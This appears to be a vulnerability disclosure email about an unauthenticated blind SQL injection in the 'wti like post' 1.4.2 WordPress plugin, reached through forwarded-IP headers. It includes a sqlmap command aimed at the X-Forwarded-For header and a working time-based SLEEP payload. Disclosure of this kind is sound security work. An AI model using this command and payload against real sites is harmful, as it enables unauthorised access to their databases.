Subject: Blind SQL injection in wti like post 1.4.2
Date: Sun, 5 Jul 2015 13:37:39 +0200

Hello,

Plugin: wti like post 1.4.2

Unauthenticated remote attackers can execute arbitrary SQL commands. Please note vendor was individually informed 10.03.2015, however still no fix.

1. SQL injection (WtiLikePostProcessVote())

Method: GET
Url: http://localhost/wp-admin/admin-ajax.php?action=wti_like_post_process_vote&task=like&post_id=62&nonce=!VALIDNONCE!
Vulnerable header parameters: HTTP_CLIENT_IP,HTTP_X_FORWARDED_FOR,
   HTTP_X_FORWARDED,HTTP_FORWARDED_FOR and HTTP_FORWARDED from WtiGetRealIpAddress() function

Example PHP callstack:
  WtiLikePostProcessVote   [/wti-like-post/wti_like_post_ajax.php:94]
  wpdb::query  

Sqlmap verification:

sqlmap --dbms mysql --headers="X-forwarded-for:1*" -u "http://localhost/wp-admin/admin-ajax.php?action=wti_like_post_process_vote&task=like&post_id=62&nonce=!VALIDNONCE!"

...
Parameter: X-forwarded-for #1* ((custom) HEADER)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: 1' AND (SELECT * FROM (SELECT(SLEEP(5)))lweB) AND 'wOmn'='wOmn
...


--
Regards,
Marcin Probola
https://wordpress.org/plugins/wti-like-post/